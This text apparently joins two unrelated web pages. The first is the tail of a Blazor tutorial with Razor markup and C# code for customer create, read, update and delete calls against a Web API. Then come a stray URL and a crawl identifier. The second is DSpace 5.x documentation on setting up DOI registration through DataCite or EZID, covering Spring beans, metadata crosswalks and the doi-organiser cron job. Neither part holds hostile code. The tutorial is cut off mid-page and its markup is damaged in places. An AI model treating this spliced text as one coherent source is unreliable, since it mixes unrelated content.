</tr> </thead> <tbody> @foreach (var cust in custs) { <tr> <td>@cust.CustCd</td> <td>@cust.CustName</td> <td>@cust.Email</td> <td>@cust.PhoneNo</td> <td>@cust.InsertBy</td> <td><button class="btn btn-primary" @Edit</button></td> <td><button class="btn btn-danger" @Delete</button></td> </tr> } </tbody> </table> } Function Part Function part to call all the web API to bind in our HTML page and also to perform client-side business logic to be displayed in Component page.In this Function we create a separate function for Add, Edit and Delete the student details and call the Web API Get,Post,Put and Delete method to perform the CRUD operations and in HTML we call all the function and bind the results. @code { private CustomerMaster[] custs; CustomerMaster custObj = new CustomerMaster(); string ids = "0"; bool showAddrow = false; bool loadFailed; protected override async Task OnInitializedAsync() { ids = "0"; custs = await Http.GetJsonAsync<CustomerMaster[]>("/api/CustomerMasters/"); } void AddNewCustomer() { ids = "0"; showAddrow = true; custObj = new CustomerMaster(); } // Add New Customer Details Method protected async Task AddCustomer() { if (ids == "0") { await Http.SendJsonAsync(HttpMethod.Post, "/api/CustomerMasters/", custObj); custs = await Http.GetJsonAsync<CustomerMaster[]>("/api/CustomerMasters/"); } else { await Http.SendJsonAsync(HttpMethod.Put, "/api/CustomerMasters/" + custObj.CustCd, custObj); custs = await Http.GetJsonAsync<CustomerMaster[]>("/api/CustomerMasters/"); } showAddrow = false; } // Edit Method protected async Task EditCustomer(string CustomerID) { showAddrow = true; ids = "1"; //try //{ loadFailed = false; ids = CustomerID.ToString(); custObj = await Http.GetJsonAsync<CustomerMaster>("/api/CustomerMasters/" + CustomerID); string s = custObj.CustCd; showAddrow = true; // } //catch (Exception ex) //{ // loadFailed = true; // Logger.LogWarning(ex, "Failed to load product {ProductId}", CustomerID); //} } // Delte Method protected async Task DeleteCustomer(string CustomerID) { showAddrow = false; ids = CustomerID.ToString(); await Http.DeleteAsync("/api/CustomerMasters/" + CustomerID); custs = await Http.GetJsonAsync<CustomerMaster[]>("/api/CustomerMasters/"); } } Navigation Menu Now we need to add this newly added CustomerEntry Razor component to our left Navigation. For adding this Open the Shared Folder and open the NavMenu.cshtml page and add the menu. <li class="nav-item px-3"> <NavLink class="nav-link" href="CustomerEntry"> <span class="oi oi-list-rich" aria-</span> Customer Master </NavLink> </li> Build and Run the application Note that when creating the DBContext and setting the connection string, don’t forget to add your SQL connection string. Here we have created table in SQl server and used with Web API you can also do this with Services and also Code First approach, Hope you all like this article. In the next article, we will see more examples to work with Blazor. It's really very cool and awesome to work with Blazor.:
https://morioh.com/p/add9bb5f7113
CC-MAIN-2020-10
refinedweb
3,397
55.64
From: Jeremy Siek (jsiek_at_[hidden]) Date: 2001-06-11 14:25:05 On Thu, 7 Jun 2001, David Abrahams wrote: > There is also this interface: > > 3. > *i ?? // returns a matrix or vector element object. > value(i) // return the element value > row(i) // returns the row index > column(i) // return the column index > index(i) // return the index (for vectors) Yes, I like this. > I very much like the free function interface, but there is always the LWG > 225/229 issue to be aware of. I am growing more convinced that under the > current language rules, having an additional tag argument which ties the > function to a namespace's semantics is the only good answer... but that's > another topic I guess. Another option is to just specify that these functions are always in the boost namespace, and people have have define their overloads in boost. As for the sparse/dense iterators... between Dave and Andrew's comments it seems that sticking with a unified interface is the way to go. Cheers,
https://lists.boost.org/Archives/boost/2001/06/13138.php
CC-MAIN-2019-47
refinedweb
171
62.27
Opened 5 years ago Closed 5 years ago #7299 closed bug (fixed) threadDelay broken in ghci, Mac OS X Description Control.Concurrent.threadDelay fails in ghci on Mac OS X. Behaviour is correct in compiled code. To reproduce, it is enough to just execute threadDelay at the prompt. Depending on the architecture, I get different behaviour: - i386: 7.6.1 and 7.7.20121003: segmentation fault (11) - x86_64: 7.6.1 and 7.7.20121003: executes without segfault, but there is no actual delay. This is on Mac OS X 10.7.5 and 10.8.2. Correct behaviour for ghci-7.6.1-x86_64 on Ubuntu 12.04. Also fine on Mac in the 7.4 series. Example output: Nightfall $ ghci GHCi, version 7.6.1: :? for help Loading package ghc-prim ... linking ... done. Loading package integer-gmp ... linking ... done. Loading package base ... linking ... done. Prelude > Foreign.Storable.sizeOf (undefined :: Int) 4 Prelude > Control.Concurrent.threadDelay (1000 * 1000) Segmentation fault: 11 Sample program for the second case: import Control.Concurrent count :: Int -> IO () count n | n <= 0 = return () | otherwise = do putStrLn $ shows n "-ah-ha-ha" threadDelay (1000 * 1000) -- 1 second count (n-1) main :: IO () main = count 10 Change History (13) comment:1 Changed 5 years ago by comment:2 Changed 5 years ago by comment:3 follow-up: 5 Changed 5 years ago by What happens if you compile with -threaded ? ghci uses the threaded RTS. Compiling with ghc, by default, does not use the threaded RTS. threadDelay follows a much different code path with -threaded than without. comment:4 Changed 5 years ago by comment:5 Changed 5 years ago by What happens if you compile with -threaded? ghci uses the threaded RTS. Compiling with ghc, by default, does not use the threaded RTS. threadDelayfollows a much different code path with -threadedthan without. Works fine compiled with "ghc -threaded", both i386 and x86_64 on 7.6.1. comment:6 Changed 5 years ago by I can reproduce this. However, it doesn't happen with a dynamic-by-default build. comment:7 Changed 5 years ago by We don't know what is wrong but Ian speculates that it's a bug in the GHCi linker, since it works with dynamic-by-default. It could also be something to do with the fact that with the GHCi linker we get two copies of the base package but have to do some hacks to make sure that there is only one blob of I/O manager state. Has anyone else come across this threadDelay problem in MacOSX? Can anyone help? Simon comment:8 Changed 5 years ago by I can reproduce this on Snow Leopard with GHC 7.6.1. comment:9 Changed 5 years ago by Looks like this is related to us having 2 copies of the base library around. The crash happens sometime around a call to absolute_time in libraries/base/cbits/DarwinUtils.c. This file doesn't exist in 7.4, which explains why it worked then. comment:10 Changed 5 years ago by I should mention that I am working on identifying the patch(es) that introduced this problem. The problem is reproducible on my Intel Mac OS X 10.5 (the tn23 builder), sometimes as segmentation faults, but more often as no apparent wait when threadDelay is called via ghci. I am using the tn23 builds as "synchronization points". Using the "repo versions" reported for each build, I have been able to, with some adjustments, to reproduce successful builds and, not least, avoid unsuccessful ones. So far, I have been able to narrow the problem as being introduced between tn23 build 599 () and build 600 (). (Build 599 is a failed build, but it is possible to repair by applying the changes of patch "da102b36bfee605d4849ab74908886b5270d37ad Fix RTS build on OS X" by hand.) In other words, the adjusted build 599 succeeds and threadDelay seems to work. And build 600 succeeds and threadDelay provides no apparent delay. It is slow going, but I expect to be able to narrow down further within the next couple of days. In the meantime, the present interval may provide some useful hints. Best regards Thorkil comment:11 Changed 5 years ago by The state in libraries/base/cbits/DarwinUtils.c would explain why threadDelay would return immediately in GHCi, but I don't see anything that would cause it to crash. In any case, the fix is to move initialize_timer and scaling_factor into the RTS (or maybe just use the existing RTS facilities). comment:12 Changed 5 years ago by comment:13 Changed 5 years ago by Fixed by commit 8a3399d5169af7a82c2c13ca7184fd307f6ea3d8 Author: Ian Lynagh <ian@well-typed.com> Date: Wed Jan 16 16:35:44 2013 +0000. Looks serious, thanks for the report.
https://ghc.haskell.org/trac/ghc/ticket/7299
CC-MAIN-2018-13
refinedweb
795
67.15
With the release of Ansible 2.9, Red Hat will officially be introducing Collections. To quote Red Hat documentation “Collections are a distribution format for Ansible content. They can be used to package and distribute playbooks, roles, modules, and plugins. You can publish and use collections through Ansible Galaxy.” This means that all the NetApp modules and roles will be located in one place to get. As of Ansible 2.10 this will also be the only way to get modules, as Ansible will no longer include modules in its installation. We will be releasing a series of collections. One for ONTAP, one for Element SW, and one for Santricity. There could be other collections in the future containing different collections of roles for various solutions. Not only are we ahead of the curve on getting our collections ready with one for ONTAP already available today, but we are one of only five companies that will have certified collections for the 2.9 release. This means even though the method for how you get, add, and update our modules is changing, the strict standards we adhere to are not. Getting and using collections are easy. If you are still on 2.8, using the application ‘mazer’ is the only way to acquire collections. You may not have mazer installed on your Ansible system so ensure it is there using pip. #> pip install mazer Then it’s just a matter of requesting the namespace and collection you want. Our namespace is ‘netapp’ and the first collection is ‘ontap’ #> mazer install netapp.ontap This will install the NetApp ONTAP collection into ~/.ansible/collections/ansible_collections/netapp/ontap/ so you will want to run the mazer install as whatever user will run Ansible, especially if you are using Tower. As a reminder, you will still need the python module netapp-lib even with collections. Updating is easy too, you just use the -f option for an update. #> mazer install netapp.ontap -f For 2.9 and above ‘ansible-galaxy’ command is used. #> ansible-galaxy collection install netapp.ontap This installs to the same location as the mazer does, the running users home directory. If you want to do a more universal installation you can use the -p flag option. # ansible-galaxy collection install netapp.ontap -p /usr/share/ansible/collections This path, /usr/share/ansible/collections, is the other default location Ansible will look for collections at. As you move to collections you will need to make one change to your playbooks. Since the location for all modules is now moving, you can add the namespace.collection call to every task and role you use like this. na_ontap_volume -> netapp.ontap.na_ontap_volume However, that is a lot of updates you might have to do. Instead you can just add two lines to the top of your playbook to be sure that you are using the collection. --- - hosts: localhost collections: - netapp.ontap Now any roles or modules in that collection can use the standard module and role name you have been using all along. Go ahead and add the collection to your Ansible environment and let us know what you think. If you have any questions about collections or how NetApp is using them, join us on our Slack channel #configurationmgmt. You can get an invite to the workspace at.
https://netapp.io/2019/09/17/coming-together-nicely/
CC-MAIN-2020-05
refinedweb
554
58.48
Deploy MySQL on Oracle’s High-Performance Cloud (Step-by-step Guide) Oracle Cloud Infrastructure (OCI) is Oracle’s second-generation cloud infrastructure. These new datacenters were built with the latest high-performance servers (Oracle’s X7 Servers) and were designed to eliminate network and CPU oversubscription. Due to high-performance systems and the multiple availability domains (ADs) in each region, these are the preferred environments for deploying MySQL. Since MySQL deploys on Compute services (IaaS), look for “Oracle Cloud Infrastructure Compute” (not Classic) on this region map. Beyond the benefits of the second-generation datacenters, why deploy MySQL on Oracle’s cloud? Here’s a few of reasons people are choosing MySQL on OCI: - No vendor lock-in: pay minimal or no egress charges and directly access your binary data files. Getting your data out of other clouds can be tedious and expensive. - Consistency: use the same database on-premise as on-cloud. It’s the MySQL Enterprise Edition, the same version available from the website. Use the same monitor for both on-premise and cloud. - Support: rely on database support from the team that develops MySQL As a new platform, extra steps are required to install the MySQL Cloud Service. Otherwise, the install will default to OCI-Classic and you’ll miss the benefits of the second-generation datacenters. If you don’t have an Oracle Cloud account, get started for free: LOGGING IN AND SETTING UP YOUR ENVIRONMENT Sign in to your Cloud Account (cloud.oracle.com) and go to My Services Dashboard. Click the Navigation menu icon navigation menu in the top left corner of the My Services Dashboard and then click Compute. This will bring you to the OCI, Oracle Cloud Infrastructure, console. - CREATE A COMPARTMENT Create a compartment called “demo”. - Click Identity. From left menu, choose Compartments and Create Compartment - Name your compartment “Demo”. 2. CREATE A NETWORK Then, create a virtual cloud network with three public subnets, which will span 3 Availability Domains (AD). Although it includes a built-in firewall to prevent intrusion, a more secure network should be used for production systems ( see VCNs and Subnets ). - Click Networking, Virtual Cloud Networks - Click Create Virtual Cloud Network Complete the following fields: - Create In Compartment: Demo - IMPORTANT: Select option: Create Virtual Cloud Network plus related resources - Click Create Virtual Cloud Network 3. ENABLE PLATFORM AS A SERVICE (PaaS) ACCESS This next step enables the MySQL Cloud Service to access the underlying compute and storage resources. - From left menu, select the dropdown for compartment list and select your root compartment. - From top menu, click Identity, Policies and Create Policy. - Name: I chose “MySQLPaaS access” - Add four Policy Statements exactly like the following: [ note: if you chose a different compartment name than demo, substitute accordingly in the following statements] Allow service PSM to inspect vcns in compartment demo Allow service PSM to use subnets in compartment demo Allow service PSM to use vnics in compartment demo Allow service PSM to manage security-lists in compartment demo - Select Create 4. CREATE A BUCKET FOR OBJECT STORAGE - Click Storage, Object Storage - Switch compartment (bottom left menu) to “Demo” - Chose Create Bucket - BucketName: MySQLBackups - Create Bucket Next, create a swift password to authenticate to the object storage. This will be required when setting up MySQL. - Click Identity, Users - For your user, choose the elipses on right and select View User Details - On left menu, choose “Auth Tokens” - Generate Token Important: Write down this token. It’s unavailable after it’s created. - While your here, write down the user name for which you’ve created this token. It should be something like: myadminaccount@email.com. You’ll need this later. If you have issues, the above steps are well-documented here. Before continuing to the next step, please write down the following from the current OCI console. You’ll need this info for the next steps. - User name: Choose Identity, Users. This should be the user for whom you generated the Authentication Token in the previous step. - Tenancy and region: Noted at top of screen - Bucketname. Choose Storage, Object Storage. Note the name of the bucket that you created 5. DEPLOY THE MYSQL CLOUD SERVICE First, navigate from OCI (Oracle Cloud Infrastructure) to the MyServices console. On the very top menu, click My Services. This should bring you back to the MyServices Dashboard. To view the MySQL Cloud Service, either click Customer Dashboard” or click the navigation menu ( three parallel lines) in upper left corner. Click MySQL and choose Open Service Console and then Create Instance. The following screenshots show appropriate field entries. Once you select “Region”, additional fields will display: Availability Domain: Select AD1 Subnet: This was setup in step #2. Click Next and complete Service Details. A full explanation of fields are available in the online documentation. However, Backup and Recovery Configuration requires further explanation. Cloud Storage Container: The OCI format is.<region>.oraclecloud.com/v1/<namespace>/<container> For me, the region is us-ashburn-1, but this may vary depending on your location and your account. The namespace is the tenancy and it’s the name of your oracle account (hint: it’s in your current URL:-<tenancy>.console.oraclecloud.com). We named our container MySQLBackups. In my case, the URL is. You will need to change the tenancy (015010) and possibly the AD (us-ashburn-1). Username: This is the user for which we created a token when setting up OCI. It’s not the name for which you sign into your MyService Dashboard. Password: This is the authentication token created in Step #4. COMPLETION Click Next and Create. After a few minutes, your MySQL instance will be running. This process has deployed MySQL onto an Oracle Compute instance (similar to EC2 instance) on the next generation datacenter. Once it’s created, identify the public IP address and ssh into the instance. Use ssh opc@xxxxxx to log into the instance. From here, you have full control of your instance. NEXT STEPS Of course, that’s a lot of steps to create a MySQL Cloud Service. Further automation is in development. In future blogs, I’ll include terraform automation instructions. Additionally, with multiple AD’s, we can set up replication for high availability. Thanks for reading. I hope this was helpful.
https://medium.com/@lstigile/deploy-mysql-on-oracles-high-performance-cloud-step-by-step-guide-44d9699511fb?source=rss-b755f531fca1------2
CC-MAIN-2019-04
refinedweb
1,046
57.27
Section (3) mblen Name mblen — determine number of bytes in next multibyte character Synopsis #include <stdlib.h> DESCRIPTION −1. −1. If s is NULL, the mblen() function resets the shift state, known to only this function, to the initial state, and returns nonzero if the encoding has nontrivial shift state, or zero if the encoding is stateless. RETURN VALUE_zsingle_quotesz_t parse a complete multibyte character. ATTRIBUTES For an explanation of the terms used in this section, see attributes(7). NOTES The behavior of mblen() depends on the LC_CTYPE category of the current locale. The function mbrlen(3) provides a better interface to the same functionality.
https://manpages.net/detail.php?name=mblen
CC-MAIN-2022-21
refinedweb
104
56.86
Accessing Attributes in the DOM Attributes are properties of the element, not children of the element. This distinction is important because of the methods used to navigate sibling, parent, and child nodes of the XML Document Object Model (DOM). For example, the PreviousSibling and NextSibling methods are not used to navigate from an element to an attribute or between attributes. Instead, an attribute is a property of an element and is owned by an element, has an OwnerElement property and not a parentNode property, and has distinct methods of navigation. When the current node is an element, use the HasAttribute method to see if there are any attributes associated with the element. Once it is known that an element has attributes, there are multiple methods for accessing attributes. To retrieve a single attribute from the element, you can use the GetAttribute and GetAttributeNode methods of the XmlElement or you can obtain all the attributes into a collection. Obtaining the collection is useful if you need to iterate over the collection. If you want all attributes from the element, use the Attributes property of the element to retrieve all the attributes into a collection. If you want all the attributes of an element node put into a collection, call the XmlElement.Attributes property. This gets the XmlAttributeCollection that contains all the attributes of an element. The XmlAttributeCollection class inherits from the XmlNamedNode map. Therefore, the methods and properties available on the collection include those available on a named node map in addition to methods and properties specific to the XmlAttributeCollection class, such as the ItemOf property or the Append method. Each item in the attribute collection represents an XmlAttribute node. To find the number of attributes on an element, get the XmlAttributeCollection, and use the Count property to see how many XmlAttribute nodes are in the collection. The following code example shows how to retrieve an attribute collection and, using the Count method for the looping index, iterate over it. The code then shows how to retrieve a single attribute from the collection and display its value. using System; using System.IO; using System.Xml; public class Sample { public static void Main() { XmlDocument doc = new XmlDocument(); doc.LoadXml("<book genre='novel' ISBN='1-861001-57-5' misc='sale item'>" + "<title>The Handmaid's Tale</title>" + "<price>14.95</price>" + "</book>"); // Move to an element. XmlElement myElement = doc.DocumentElement; // Create an attribute collection from the element. XmlAttributeCollection attrColl = myElement.Attributes; // Show the collection by iterating over it. Console.WriteLine("Display all the attributes in the collection..."); for (int i = 0; i < attrColl.Count; i++) { Console.Write("{0} = ", attrColl[i].Name); Console.Write("{0}", attrColl[i].Value); Console.WriteLine(); } // Retrieve a single attribute from the collection; specifically, the // attribute with the name "misc". XmlAttribute attr = attrColl["misc"]; // Retrieve the value from that attribute. String miscValue = attr.InnerXml; Console.WriteLine("Display the attribute information."); Console.WriteLine(miscValue); } } This example displays the following output: Output Display all the attributes in the collection. The information in an attribute collection can be retrieved by name or index number. The example above shows how to retrieve data by name. The next example shows how to retrieve data by index number. Because the XmlAttributeCollection is a collection and can be iterated over by name or index, this example shows selecting the first attribute out of the collection using a zero-based index and using the following file, baseuri.xml, as input. using System; using System.IO; using System.Xml; public class Sample { public static void Main() { // Create the XmlDocument. XmlDocument doc = new XmlDocument(); doc.Load(""); // Display information on the attribute node. The value // returned for BaseURI is ''. XmlAttribute attr = doc.DocumentElement.Attributes[0]; Console.WriteLine("Name of the attribute: {0}", attr.Name); Console.WriteLine("Base URI of the attribute: {0}", attr.BaseURI); Console.WriteLine("The value of the attribtue: {0}", attr.InnerText); } } To retrieve a single attribute node from an element, the XmlElement.GetAttributeNode method is used. It returns an object of type XmlAttribute. Once you have an XmlAttribute, all the methods and properties available in the XmlAttribute Members class are available on that object, such as finding the OwnerElement. using System; using System.IO; using System.Xml; public class Sample { public static void Main() { XmlDocument doc = new XmlDocument(); doc.LoadXml("<book genre='novel' ISBN='1-861003-78' misc='sale item'>" + "<title>The Handmaid's Tale</title>" + "<price>14.95</price>" + "</book>"); // Move to an element. XmlElement root = doc.DocumentElement; // Get an attribute. XmlAttribute attr = root.GetAttributeNode("ISBN"); // Display the value of the attribute. String attrValue = attr.InnerXml; Console.WriteLine(attrValue); } } You can also do as shown in the previous example, where a single attribute node is retrieved from the attribute collection. The following code example shows how one line of code can be written to retrieve a single attribute by index number from the root of the XML document tree, also known as the DocumentElement property.
http://msdn.microsoft.com/EN-US/library/hk61a712
CC-MAIN-2014-15
refinedweb
818
51.44
As far as I know, it is legal to include a namespace prefix in template (and param and variable) names as well as template modes because according to the specs, these attributes must be QNames. However, I get an error highlighting when doing something like <xsl:template Is that a problem of the XSLT Plugin or IDEA? Regards, Jens As far as I know, it is legal to include a namespace prefix in Jens Voß wrote: Yes, that was introduced with the latest version of the plugin which checks the validity of declared identifiers. I'll fix the "Illegal name" highlighting for valid QNames, but the internal support will be limited to names with identical prefixes. I'll put full support for QNames (i.e. to resolve by namespace + local name) on my list, but it's currently not a top-priority item. Sorry :( Sascha
https://intellij-support.jetbrains.com/hc/en-us/community/posts/206120289-XsltPlugin-Problems-with-qualified-names?page=1
CC-MAIN-2019-22
refinedweb
145
64.85
Old Release This documentation relates to an old version of DSpace, version 5.x. Looking for another version? See all documentation. Persistent Identifier It is good practice to use Persistent Identifiers to address items in a digital repository. There are many different systems for Persistent Identifiers: Handle , DOI , urn:nbn, purl and many more. It is far out of the scope of this document to discuss the differences of all these systems. For several reasons the Handle System is deeply integrated in DSpace, and DSpace makes intensive use of it. With DSpace 3.0 the Identifier Service was introduced that makes it possible to also use external identifier services within DSpace. DOIs are Persistent Identifiers like Handles are, but as many big publishing companies use DOIs they are quite well-known to scientists. Some journals ask for DOIs to link supplemental material whenever an article is submitted. Beginning with DSpace 4.0 it is possible to use DOIs in parallel to the Handle System within DSpace. By "using DOIs" we mean automatic generation, reservation and registration of DOIs for every item that enters the repository. These newly registered DOIs will not be used as a means to build URLs to DSpace items. Items will still rely on handle assignment for the item urls. DOI Registration Agencies To register a DOI one has to enter into a contract with a DOI registration agency which is a member of the International DOI Foundation. Several such agencies exist. Different DOI registration agencies have different policies. Some of them offer DOI registration especially or only for academic institutions, others only for publishing companies. Most of the registration agencies charge fees for registering DOIs, and all of them have different rules describing for what kind of item a DOI can be registered. To make it quite clear: to register DOIs with DSpace you have to enter into a contract with a DOI registration agency. DataCite is an international initiative to promote science and research, and a member of the International DOI Foundation. The members of DataCite act as registration agencies for DOIs. Some DataCite members provide their own APIs to reserve and register DOIs; others let their clients use the DataCite API directly. Starting with version 4.0 DSpace supports the administration of DOIs by using the DataCite API directly or by using the API from EZID (which is a service of the University of California Digital Library). This means you can administer DOIs with DSpace if your registration agency allows you to use the DataCite API directly or if your registration agency is EZID. Configure DSpace to use the DataCite API If you use a DOI registration agency that lets you use the DataCite API directly, you can follow the instructions below to configure DSpace. In case EZID is your registration agency the configuration of DSpace is documented here: Configure DSpace to use EZID service for registration of DOIs. To use DOIs within DSpace you have to configure several parts of DSpace: - enter your DOI prefix and the credentials to use the API from DataCite in dspace.cfg, - configure the script which generates some metadata, - activate the DOI mechanism within DSpace, - configure a cron job which transmits the information about new and changed DOIs to the registration agency. dspace.cfg After you enter into a contract with a DOI registration agency, they'll provide you with user credentials and a DOI prefix. You have to enter these in the dspace cfg. Here is a list of DOI configuration options in dspace.cfg: Please don't use the test prefix 10.5072 with DSpace. The test prefix 10.5072 differs from other prefixes: It answers GET requests for all DOIs even for DOIs that are unregistered. DSpace checks that it mint only unused DOIs and will create an Error: "Register DOI ... failed: DOI_ALREADY_EXISTS". Your registration agency can provide you an individual test prefix, that you can use for tests. Metadata conversion To reserve or register a DOI, DataCite requires that metadata be supplied which describe the object that the DOI addresses. The file [dspace]/config/crosswalks/DIM2DataCite.xsl controls the conversion of metadata from the DSpace internal format into the DataCite format. You have to add the name of your institution to this file: <!-- Document : DIM2DataCite.xsl Created on : January 23, 2013, 1:26 PM Author : pbecker, ffuerste Description: Converts metadata from DSpace Intermediat Format (DIM) into metadata following the DataCite Schema for the Publication and Citation of Research Data, Version 2.2 --> <xsl:stylesheet xmlns: <!-- CONFIGURATION --> <!-- The content of the following variable will be used as element publisher. --> <xsl:variableMy University</xsl:variable> <!-- The content of the following variable will be used as element contributor with contributorType datamanager. --> <xsl:variable<xsl:value-of</xsl:variable> <!-- The content of the following variable will be used as element contributor with contributorType hostingInstitution. --> <xsl:variable<xsl:value-of</xsl:variable> <!-- Please take a look into the DataCite schema documentation if you want to know how to use these elements. --> <!-- DO NOT CHANGE ANYTHING BELOW THIS LINE EXCEPT YOU REALLY KNOW WHAT YOU ARE DOING! --> ... Just change the value in the variable named "publisher". If you want to know more about the DataCite Schema, have a look at the documentation. If you change this file in a way that is not compatible with the DataCite schema, you won't be able to reserve and register DOIs anymore. Do not change anything if you're not sure what you're doing. Identifier Service The Identifier Service manages the generation, reservation and registration of identifiers within DSpace. You can configure it using the config file located in [dspace]/config/spring/api/identifier-service.xml. In the file you should already find the code to configure DSpace to register DOIs. Just read the comments and remove the comment signs around the two appropriate beans. After removing the comment signs the file should look something like this (I removed the comments to make the listing shorter): <!-- Copyright (c) 2002-2010, DuraSpace. All rights reserved Licensed under the DuraSpace License. A copy of the DuraSpace License has been included in this distribution and is available at: --> <beans xmlns="" xmlns: <bean id="org.dspace.identifier.IdentifierService" class="org.dspace.identifier.IdentifierServiceImpl" autowire="byType" scope="singleton"/> <bean id="org.dspace.identifier.DOIIdentifierProvider" class="org.dspace.identifier.DOIIdentifierProvider" scope="singleton"> <property name="configurationService" ref="org.dspace.services.ConfigurationService" /> <property name="DOIConnector" ref="org.dspace.identifier.doi.DOIConnector" /> </bean> <bean id="org.dspace.identifier.doi.DOIConnector" class="org.dspace.identifier.doi.DataCiteConnector" scope="singleton"> <property name='DATACITE_SCHEME' value='https'/> <property name='DATACITE_HOST' value='mds.test.datacite.org'/> <property name='DATACITE_DOI_PATH' value='/doi/' /> <property name='DATACITE_METADATA_PATH' value='/metadata/' /> <property name='disseminationCrosswalkName' value="DataCite" /> </bean> </beans> If you use other IdentifierProviders beside the DOIIdentifierProvider there will be more beans in this file. Please pay attention to configure the property DATACITE_HOST. Per default it is set to the DataCite test server. To reserve real DOIs you will probably have to change it to mds.datacite.org. Ask your registration agency if you're not sure about the correct address. For sometime unfortunately the test and the production server of Datacite had different paths to the API. Those paths has changed after the release of DSpace 5.4. Please use the properties DATACITE_HOST, DATACITE_DOI_PATH and DATACITE_METADATA_PATH as mentioned above to connect to the test server and change the DATACITE_HOST to mds.datacite.org when you want to to switch to the production server of DataCite (registering real DOIs). DSpace should send updates to DataCite whenever the metadata of an item changes. To do so you have to change the dspace.cfg again. You should remove the comments in front of the two following properties or add them to the dspace.cfg: event.consumer.doi.class = org.dspace.identifier.doi.DOIConsumer event.consumer.doi.filters = Item+Modify_Metadata Then you should add 'doi' to the property event.dispatcher.default.consumers. After adding it, this property may look like this: event.dispatcher.default.consumers = versioning, discovery, eperson, harvester, doi Command Line Interface To make DSpace resistant to outages of DataCite we decided to separate the DOI support into two parts. When a DOI should be generated, reserved or minted, DSpace does this in its own database. To perform registration and/or reservation against the DOI registration agency a job has to be started using the command line. Obviously this should be done by a cron job periodically. In this section we describe the command line interface, in case you ever want to use it manually. In the next section you'll see the cron job that transfers all DOIs designated for reservation and/or registration. The command line interface in general is documented here: Command Line Operations. The command used for DOIs is ' doi-organiser'. You can use the following options: Currently you cannot generate new DOIs with this tool. You can only send information about changes in your local DSpace database to the registration agency. 'cron' job for asynchronous reservation/registration When a DOI should be reserved, registered, deleted or its metadata updated, DSpace just writes this information into its local database. A command line interface is supplied to send the necessary information to the registration agency. This behavior makes it easier to react to outages or errors while using the API. This information should be sent regularly, so it is a good idea to set up a cron job instead of doing it manually. There are four commands that should be run regularly: - Update the metadata of all items that have changed since their DOI was reserved. - Reserve all DOIs marked for reservation - Register all DOIs marked for registration - Delete all DOIs marked for deletion In DSpace, a DOI can have the state "registered", "reserved", "to be reserved", "to be registered", "needs update", "to be deleted", or "deleted". After updating an item's metadata the state of its assigned DOI is set back to the last state it had before. So, e.g., if a DOI has the state "to be registered" and the metadata of its item changes, it will be set to the state "needs update". After the update is performed its state is set to "to be registered" again. Because of this behavior the order of the commands above matters: the update command must be executed before all of the other commands above. The cron job should perform the following commands with the rights of the user your DSpace installation runs as: [dspace]/bin/dspace doi-organiser -u -q [dspace]/bin/dspace doi-organiser -s -q [dspace]/bin/dspace doi-organiser -r -q [dspace]/bin/dspace doi-organiser -d -q The doi-organiser sends error messages as email and logs some additional information. The option -q tells DSpace to be quiet. If you don't use this option the doi-organiser will print messages to stdout about every DOI it successfully reserved, registered, updated or deleted. Using a cron job these messages would be sent as email. In case of an error, consult the log messages. If there is an outage of the API of your registration agency, DSpace will not change the state of the DOIs so that it will do everything necessary when the cron job starts the next time and the API is reachable again. The frequency the cron job runs depends on your needs and your hardware. The more often you run the cron job the faster your new DOIs will be available online. If you have a lot of submissions and want the DOIs to be available really quickly, you probably should run the cron job every fifteen minutes. If there are just one or two submissions per day, it should be enough to run the cron job twice a day. To set up the cron job, you just need to run the following command as the dspace UNIX user: crontab -e The following line tells cron to run the necessary commands twice a day, at 1am and 1pm. Please notice that the line starting with the numbers is one line, even it it should be shown as multiple lines in your browser. # Send information about new and changed DOIs to the DOI registration agency: 0 1,13 * * * [dspace]/bin/dspace doi-organiser -u -q ; [dspace]/bin/dspace doi-organiser -s -q ; [dspace]/bin/dspace doi-organiser -r -q ; [dspace]/bin/dspace doi-organiser -d -q Limitations of DataCite DOI support That means if you want to use other applications or even more than one DSpace installation to register DOIs with the same prefix, you'll have to use a unique namespace separator for each of them. Also you should not generate DOIs manually with the same prefix and namespace separator you configured within DSpace. For example, if your prefix is 10.5072 you can configure one DSpace installation to generate DOIs starting with 10.5072/papers-, a second installation to generate DOIs starting with 10.5072/data- and another application to generate DOIs starting with 10.5072/results-.. DSpace currently generates DOIs for items only. There is no support to generate DOIs for Communities and collections yet. When using DSpace's support for the DataCite API probably not all information would be restored when using the AIP Backup and Restore (see DS-1836). The DOIs included in metadata of Items will be restored, but DSpace won't update the metadata of those items at DataCite anymore. You can even get problems when minting new DOIs after you restored older once using AIP. Configure DSpace to use EZID service for registration of DOIs The EZID IdentifierProvider operates synchronously, so there is much less to configure. You will need to un-comment the org.dspace.identifier.EZIDIdentifierProvider bean in config/spring/api/identifier-service.xml to enable DOI registration through EZID. In config/dspace.cfg you will find a small block of settings whose names begin with identifier.doi.ezid. You should uncomment these properties and give them appropriate values. Sample values for a test account are supplied. Back in config/spring/api/identifier-service.xml you will see some other configuration of the EZIDIdentiferProvider bean. In most situations, the default settings should work well. But, here's an explanation of options available: - EZID Provider / Registrar settings: By default, the EZIDIdentifierProvider is configured to use the CDLib provider (ezid.cdlib.org) in the EZID_SCHEME, EZID_HOSTand EZID_PATHsettings. In most situations, the default values should work for you. However, you may need to modify these values (especially the EZID_HOST) if you are registered with a different EZID provider. In that situation, please check with your provider for valid "host" and "path" settings. If your provider provides EZID service at a particular path on its host, you may set that in EZID_PATH. - NOTE: As of the writing of this documentation, the default CDLib provider settings should also work for institutions that use Purdue (ezid.lib.purdue.edu) as a provider. Currently, Purdue and CDLib currently share the same infrastructure, and both ezid.cdlib.organd ezid.lib.purdue.edupoint to the same location. - Metadata mappings: You can alter the mapping between DSpace and EZID metadata, should you choose. The crosswalkproperty is a map from DSpace metadata fields to EZID fields, and can be extended or changed. The keyof each entryis the name of an EZID metadata field; the valueis the name of the corresponding DSpace field, from which the EZID metadata will be populated. - Crosswalking / Transforms: You can also supply transformations to be applied to field values using the crosswalkTransformproperty. Each keyis the name of an EZID metadata field, and its valueis the name of a Java class which will convert the value of the corresponding DSpace field to its EZID form. The only transformation currently provided is one which converts a date to the year of that date, named org.dspace.identifier.ezid.DateToYear. In the configuration as delivered, it is used to convert the date of issue to the year of publication. You may create new Java classes with which to supply other transformations, and map them to metadata fields here. If an EZID metadatum is not named in this map, the default mapping is applied: the string value of the DSpace field is copied verbatim. Limitations of EZID DOI support. Currently, the EZIDIdentifierProvider has a known issue where it stores its DOIs in the dc.identifier field, instead of using the dc.identifier.uri field (which is the one used by DataCite DOIs and Handles). See DS-2199 for more details. This will be corrected in a future version of DSpace. DSpace currently generates DOIs for items only. There is no 